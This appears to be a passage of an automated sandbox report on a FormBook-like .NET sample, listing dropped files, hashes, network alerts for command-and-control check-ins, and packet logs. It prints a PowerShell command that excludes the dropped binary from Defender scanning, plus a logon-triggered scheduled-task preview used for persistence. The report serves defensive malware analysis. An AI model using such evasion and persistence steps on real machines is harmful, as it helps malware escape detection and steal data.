	U3iFi37tNT.exe	Get hash	malicious	Browse	118.27.122.216
	PdEfGHtczV.exe	Get hash	malicious	Browse	157.7.44.214
	v7KGQZ70fj.exe	Get hash	malicious	Browse	157.7.107.193
	ITRli68rgq.exe	Get hash	malicious	Browse	150.95.255.38
	4Z5YpFMKR0.exe	Get hash	malicious	Browse	118.27.122.216
	ja71FJcG4X.exe	Get hash	malicious	Browse	150.95.255.38
	Jrc9iR2XxH.exe	Get hash	malicious	Browse	150.95.255.38
	Purchase Order-10,000MT.exe	Get hash	malicious	Browse	118.27.122.221
	iSBX2z1os7.exe	Get hash	malicious	Browse	150.95.255.38
	8PRjJeUifB	Get hash	malicious	Browse	133.130.112.159
	fdnVx1v1hc.exe	Get hash	malicious	Browse	157.7.107.193
	mxHkqAIYT0	Get hash	malicious	Browse	118.27.80.208
	NCh22JHZDm.exe	Get hash	malicious	Browse	150.95.255.38
	Draft shipping docs CI+PL_pdf.exe	Get hash	malicious	Browse	150.95.255.38
	SHIPPPING-DOC.xlsx	Get hash	malicious	Browse	150.95.255.38
	AA9FF4E33F61DD2FC164A21D0A53397F19B7F9C64D786.exe	Get hash	malicious	Browse	157.7.144.96

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log Download File
Process:	C:\Users\user\Desktop\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	22284
Entropy (8bit):	5.353881910568184
Encrypted:	false
SSDEEP:	384:ItCDbSTnJDrnVXf1JNcbnusm7u5c+Ohhbm1dOYlw4aC:DyJ/npXS7usw8c+gbqflT
MD5:	0D67EDF91C635D7850EF610BA3B6E80E
SHA1:	4E3C716CEB41805F4EBEC8E01E2D69660457AF54
SHA-256:	A6D8C87A3E4DA7C3B5B97E35199A28779B014EFAC9AD41187D1C4BD15B66299D
SHA-512:	7792499CA1DF9740430C00C695D4D981015FCAC4514F27F60824262CECB1330B68070722233CB1026B1AEBE4D8343370A1051C20500A532C536AB72B9FE36B45
Malicious:	false
Reputation:	low
Preview:	@...e...........\|.......h.....w.t.....y...I..........@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lq3sbvzj.wru.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nn4teh0l.j21.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\tmpAA68.tmp Download File
Process:	C:\Users\user\Desktop\vbc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1663
Entropy (8bit):	5.177504026201777
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/dp7hdMlNMFpdU/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBFtn:cbhH7MlNQ8/rydbz9I3YODOLNdq3t
MD5:	E7C4E7B70996F6294F5F000C26736157
SHA1:	44691C6732ED527445581CE7953F35BA9FB57A0C
SHA-256:	241672A3BAC2F63F1BD79B1F48B7C1F5B4F2D471652EFA5D367549DB7E85E084
SHA-512:	7C28CFD9CF220B143D08741D0BF601D06328508AD571D9258C456BF0FBD4A7B9E7E9648A7C1913834AD6915AB80DE265ED59BE81292BE32EA3535781E5AE5B00
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAv

C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe Download File
Process:	C:\Users\user\Desktop\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	368640
Entropy (8bit):	7.907277852559704
Encrypted:	false
SSDEEP:	6144:hC9EDghMkMs4P2CW2RT9cERCtbjqg2vcy8a9KI75uhPLTDcfAYGQLomQVHb:h1DghTjPymtvqg4ya9R75AzOAcomQV7
MD5:	C4A1BDD685E346B7604F93357A922875
SHA1:	6B8FCCADCF1977F5850FAA1C47617343FAFC0FF4
SHA-256:	728B23F75C1140A1763DD7C75083F2AE57AFEB6FFA3D7B33A9BA1B4904C4566D
SHA-512:	15FD260D342AB48A0A23293EE49DC50150B0EDAABF869F9E2A80BB7946FE5483CB4D89037352AD76008FFCA703B93A68361F1D4FFD1E09F37996D5DF47BC6CA3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(-.a................................. ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......Xe...X..........`...V............................................0..:.......+.&.+.&. ....8............s....}.....s....}.... ....(4...:....&..%.."...s....}......\|.....\|....(#......\|.....\|....(#... .....:T...&. .'..}.... ....(5...99...&.(3...8....& ....8".......}......}....8I... ............E................................@...9... ....8.......}..... ,...}.....(5...:....& ....(4...:....&....+.&..{....2+.&...}........0..........+.&....8........+.&..{....*2+.&...}....

C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\20211109\PowerShell_transcript.921702.y9Ja5PCc.20211109125606.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5845
Entropy (8bit):	5.388652589278563
Encrypted:	false
SSDEEP:	96:BZQ6VN2qDo1ZNZ96VN2qDo1ZDTdLjZP6VN2qDo1ZwmbbhZm:l
MD5:	5428FD441DF4A369B3F10ABABA0933E5
SHA1:	8BCE64310E0A65B24558C7C05A99177624050540
SHA-256:	27FE637C478154A60944EC3E45F92277C28630985AFEC17CB104516F4970C5E8
SHA-512:	C7799055AD9994136A3B1AC72BFB37FC1AD79E58A24C5BEBE771444BAEE810AB50D11609305E6F8017B21188C027824D54920A516801399B92D78124B358BF28
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20211109125607..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 921702 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe..Process ID: 6604..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20211109125607..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe..********************..Windows PowerShell transcript start..Start time: 20211109130015..Username: computer\user..RunA

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.907277852559704
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	vbc.exe
File size:	368640
MD5:	c4a1bdd685e346b7604f93357a922875
SHA1:	6b8fccadcf1977f5850faa1c47617343fafc0ff4
SHA256:	728b23f75c1140a1763dd7c75083f2ae57afeb6ffa3d7b33a9ba1b4904c4566d
SHA512:	15fd260d342ab48a0a23293ee49dc50150b0edaabf869f9e2a80bb7946fe5483cb4d89037352ad76008ffca703b93a68361f1d4ffd1e09f37996d5df47bc6ca3
SSDEEP:	6144:hC9EDghMkMs4P2CW2RT9cERCtbjqg2vcy8a9KI75uhPLTDcfAYGQLomQVHb:h1DghTjPymtvqg4ya9R75AzOAcomQV7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(-.a................................. ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x45b50e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x618A2D28 [Tue Nov 9 08:11:20 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5b4c0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5c000	0x5d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x59514	0x59600	False	0.893217329545	data	7.9203967863	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x5c000	0x5d8	0x600	False	0.431640625	data	4.16950249458	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5e000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x5c0a0	0x34c	data
RT_MANIFEST	0x5c3ec	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright usda 2011
Assembly Version	1.0.0.0
InternalName	ICollecti.exe
FileVersion	1.0.0.0
CompanyName	usda
LegalTrademarks
Comments
ProductName	HidLib.SampleApp
ProductVersion	1.0.0.0
FileDescription	HidLib.SampleApp
OriginalFilename	ICollecti.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/09/21-12:57:17.665894	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49794	80	192.168.2.7	44.227.65.245
11/09/21-12:57:17.665894	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49794	80	192.168.2.7	44.227.65.245
11/09/21-12:57:17.665894	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49794	80	192.168.2.7	44.227.65.245
11/09/21-12:57:29.013759	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49816	80	192.168.2.7	172.67.188.247
11/09/21-12:57:29.013759	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49816	80	192.168.2.7	172.67.188.247
11/09/21-12:57:29.013759	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49816	80	192.168.2.7	172.67.188.247
11/09/21-12:57:34.283009	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49818	34.102.136.180	192.168.2.7
11/09/21-12:57:39.595240	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.2.7	101.132.116.91
11/09/21-12:57:39.595240	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.2.7	101.132.116.91
11/09/21-12:57:39.595240	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.2.7	101.132.116.91
11/09/21-12:57:48.252391	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.7	8.8.8.8
11/09/21-12:57:49.299373	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.7	8.8.8.8
11/09/21-12:58:02.641444	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49848	34.102.136.180	192.168.2.7
11/09/21-12:58:08.507989	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49850	103.118.81.108	192.168.2.7
11/09/21-12:58:13.678079	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49851	34.102.136.180	192.168.2.7

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 9, 2021 12:57:17.263117075 CET	49794	80	192.168.2.7	44.227.65.245
Nov 9, 2021 12:57:17.464613914 CET	80	49794	44.227.65.245	192.168.2.7
Nov 9, 2021 12:57:17.464808941 CET	49794	80	192.168.2.7	44.227.65.245
Nov 9, 2021 12:57:17.665780067 CET	80	49794	44.227.65.245	192.168.2.7
Nov 9, 2021 12:57:17.665894032 CET	49794	80	192.168.2.7	44.227.65.245
Nov 9, 2021 12:57:17.866852045 CET	80	49794	44.227.65.245	192.168.2.7
Nov 9, 2021 12:57:17.870632887 CET	80	49794	44.227.65.245	192.168.2.7
Nov 9, 2021 12:57:17.870656967 CET	80	49794	44.227.65.245	192.168.2.7
Nov 9, 2021 12:57:17.870831013 CET	49794	80	192.168.2.7	44.227.65.245
Nov 9, 2021 12:57:17.870949984 CET	49794	80	192.168.2.7	44.227.65.245
Nov 9, 2021 12:57:18.072505951 CET	80	49794	44.227.65.245	192.168.2.7
Nov 9, 2021 12:57:23.135832071 CET	49815	80	192.168.2.7	118.27.122.222
Nov 9, 2021 12:57:23.410075903 CET	80	49815	118.27.122.222	192.168.2.7
Nov 9, 2021 12:57:23.410485983 CET	49815	80	192.168.2.7	118.27.122.222
Nov 9, 2021 12:57:23.410603046 CET	49815	80	192.168.2.7	118.27.122.222
Nov 9, 2021 12:57:23.684633970 CET	80	49815	118.27.122.222	192.168.2.7
Nov 9, 2021 12:57:23.685393095 CET	80	49815	118.27.122.222	192.168.2.7
Nov 9, 2021 12:57:23.685415030 CET	80	49815	118.27.122.222	192.168.2.7
Nov 9, 2021 12:57:23.685635090 CET	49815	80	192.168.2.7	118.27.122.222
Nov 9, 2021 12:57:23.685856104 CET	49815	80	192.168.2.7	118.27.122.222
Nov 9, 2021 12:57:23.959731102 CET	80	49815	118.27.122.222	192.168.2.7
Nov 9, 2021 12:57:28.980609894 CET	49816	80	192.168.2.7	172.67.188.247
Nov 9, 2021 12:57:29.008771896 CET	80	49816	172.67.188.247	192.168.2.7
Nov 9, 2021 12:57:29.008956909 CET	49816	80	192.168.2.7	172.67.188.247
Nov 9, 2021 12:57:29.013758898 CET	49816	80	192.168.2.7	172.67.188.247
Nov 9, 2021 12:57:29.041816950 CET	80	49816	172.67.188.247	192.168.2.7
Nov 9, 2021 12:57:29.071464062 CET	80	49816	172.67.188.247	192.168.2.7
Nov 9, 2021 12:57:29.071500063 CET	80	49816	172.67.188.247	192.168.2.7
Nov 9, 2021 12:57:29.071659088 CET	49816	80	192.168.2.7	172.67.188.247
Nov 9, 2021 12:57:29.071784973 CET	49816	80	192.168.2.7	172.67.188.247
Nov 9, 2021 12:57:29.099801064 CET	80	49816	172.67.188.247	192.168.2.7
Nov 9, 2021 12:57:34.146682978 CET	49818	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:57:34.165709019 CET	80	49818	34.102.136.180	192.168.2.7
Nov 9, 2021 12:57:34.168278933 CET	49818	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:57:34.168477058 CET	49818	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:57:34.187295914 CET	80	49818	34.102.136.180	192.168.2.7
Nov 9, 2021 12:57:34.283009052 CET	80	49818	34.102.136.180	192.168.2.7
Nov 9, 2021 12:57:34.283037901 CET	80	49818	34.102.136.180	192.168.2.7
Nov 9, 2021 12:57:34.283171892 CET	49818	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:57:34.283231020 CET	49818	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:57:34.594325066 CET	49818	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:57:34.613336086 CET	80	49818	34.102.136.180	192.168.2.7
Nov 9, 2021 12:57:39.346448898 CET	49821	80	192.168.2.7	101.132.116.91
Nov 9, 2021 12:57:39.594898939 CET	80	49821	101.132.116.91	192.168.2.7
Nov 9, 2021 12:57:39.595088959 CET	49821	80	192.168.2.7	101.132.116.91
Nov 9, 2021 12:57:39.595240116 CET	49821	80	192.168.2.7	101.132.116.91
Nov 9, 2021 12:57:40.121010065 CET	49821	80	192.168.2.7	101.132.116.91
Nov 9, 2021 12:57:40.172657967 CET	49821	80	192.168.2.7	101.132.116.91
Nov 9, 2021 12:57:40.386682034 CET	80	49821	101.132.116.91	192.168.2.7
Nov 9, 2021 12:57:40.442859888 CET	80	49821	101.132.116.91	192.168.2.7
Nov 9, 2021 12:57:40.442886114 CET	80	49821	101.132.116.91	192.168.2.7
Nov 9, 2021 12:57:40.443016052 CET	49821	80	192.168.2.7	101.132.116.91
Nov 9, 2021 12:57:40.443337917 CET	49821	80	192.168.2.7	101.132.116.91
Nov 9, 2021 12:57:57.405693054 CET	49847	80	192.168.2.7	104.21.4.114
Nov 9, 2021 12:57:57.422708988 CET	80	49847	104.21.4.114	192.168.2.7
Nov 9, 2021 12:57:57.422836065 CET	49847	80	192.168.2.7	104.21.4.114
Nov 9, 2021 12:57:57.423017979 CET	49847	80	192.168.2.7	104.21.4.114
Nov 9, 2021 12:57:57.441745043 CET	80	49847	104.21.4.114	192.168.2.7
Nov 9, 2021 12:57:57.453866005 CET	80	49847	104.21.4.114	192.168.2.7
Nov 9, 2021 12:57:57.453880072 CET	80	49847	104.21.4.114	192.168.2.7
Nov 9, 2021 12:57:57.454087973 CET	49847	80	192.168.2.7	104.21.4.114
Nov 9, 2021 12:57:57.454360962 CET	49847	80	192.168.2.7	104.21.4.114
Nov 9, 2021 12:57:57.472325087 CET	80	49847	104.21.4.114	192.168.2.7
Nov 9, 2021 12:58:02.506881952 CET	49848	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:58:02.525774956 CET	80	49848	34.102.136.180	192.168.2.7
Nov 9, 2021 12:58:02.526007891 CET	49848	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:58:02.526216030 CET	49848	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:58:02.547923088 CET	80	49848	34.102.136.180	192.168.2.7
Nov 9, 2021 12:58:02.641443968 CET	80	49848	34.102.136.180	192.168.2.7
Nov 9, 2021 12:58:02.641474962 CET	80	49848	34.102.136.180	192.168.2.7
Nov 9, 2021 12:58:02.641747952 CET	49848	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:58:02.641813040 CET	49848	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:58:02.660756111 CET	80	49848	34.102.136.180	192.168.2.7
Nov 9, 2021 12:58:13.543569088 CET	49851	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:58:13.562455893 CET	80	49851	34.102.136.180	192.168.2.7
Nov 9, 2021 12:58:13.562738895 CET	49851	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:58:13.562832117 CET	49851	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:58:13.581716061 CET	80	49851	34.102.136.180	192.168.2.7
Nov 9, 2021 12:58:13.678078890 CET	80	49851	34.102.136.180	192.168.2.7
Nov 9, 2021 12:58:13.678164005 CET	80	49851	34.102.136.180	192.168.2.7
Nov 9, 2021 12:58:13.678350925 CET	49851	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:58:13.678407907 CET	49851	80	192.168.2.7	34.102.136.180
Nov 9, 2021 12:58:13.698116064 CET	80	49851	34.102.136.180	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 9, 2021 12:57:17.065556049 CET	64296	53	192.168.2.7	8.8.8.8
Nov 9, 2021 12:57:17.257793903 CET	53	64296	8.8.8.8	192.168.2.7
Nov 9, 2021 12:57:22.879528999 CET	49247	53	192.168.2.7	8.8.8.8
Nov 9, 2021 12:57:23.134397984 CET	53	49247	8.8.8.8	192.168.2.7
Nov 9, 2021 12:57:28.956065893 CET	52286	53	192.168.2.7	8.8.8.8
Nov 9, 2021 12:57:28.979376078 CET	53	52286	8.8.8.8	192.168.2.7
Nov 9, 2021 12:57:34.122539997 CET	63744	53	192.168.2.7	8.8.8.8
Nov 9, 2021 12:57:34.145211935 CET	53	63744	8.8.8.8	192.168.2.7
Nov 9, 2021 12:57:39.320169926 CET	58367	53	192.168.2.7	8.8.8.8
Nov 9, 2021 12:57:39.345231056 CET	53	58367	8.8.8.8	192.168.2.7
Nov 9, 2021 12:57:45.131288052 CET	60599	53	192.168.2.7	8.8.8.8
